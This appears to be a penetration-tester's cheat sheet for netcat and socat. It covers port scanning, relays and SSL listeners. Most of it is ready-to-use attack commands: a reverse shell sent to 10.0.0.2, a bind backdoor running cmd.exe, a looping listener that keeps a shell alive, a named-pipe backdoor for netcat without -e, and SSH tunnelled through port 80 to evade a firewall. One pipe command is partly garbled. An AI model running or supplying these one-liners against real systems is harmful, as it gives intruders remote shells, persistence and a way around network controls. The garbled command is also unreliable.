# Netcat & Socat ## Netcat ### Basics Connect to a socket on host `192.168.1.1` on TCP port 81 ```bash nc 192.168.1.1 81 ``` Listen on the local machine for inbound TCP connections on port 81 ``` nc -nvlp 81 ``` Reverse shell sent to host `10.0.0.2` over TCP port 53 ```bash nc 10.0.0.2 53 -e /bin/bash ``` Backdoor listening on TCP 80 set to execute cmd.exe when connected ```bash nc -nvlp 80 -e cmd.exe ``` ### More Fancy Attempt to connect to each port from 10-90 on `10.0.0.1`, don't resolve any names `-n`, don't send any data `-z`, and only wait 1 second for a connection `-w1` ```bash nc -nvzw1 10.0.0.1 10-90 ``` Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing `nc` in a bash true loop is an easy way to work around this, use `nohup` also! ```bash while [ 1 ]; do echo “started”; nc -l -p 1234 -e /bin/sh; done ``` Netcat relay used to forward everything received by the host on TCP 4321 sent to `10.0.0.1` on TCP 8123 ```bash nc -l -p 4321 | nc 10.0.0.1 8123 ``` Create a `netcat` backdoor without `-e` support. This generates a named pipe which is used to funnel data between `bash` and `nc`. ```bash mknod backpipe p /bin/bash 0backpipe ``` ### Firewall Evasion If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output ```bash mknod mypipe p nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe ssh backdoor@m4lwhere.org -p 80 # Attcker command to connect to ssh piped thru port 80 ``` ## Socat socat is a program which can be used for enhanced netcat usage. Supports SSL and forking ``` # Below command listens locally on 8080, forwards connections to 10.0.0.1:80 socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80 # Listen with SSL and send to std out socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio ```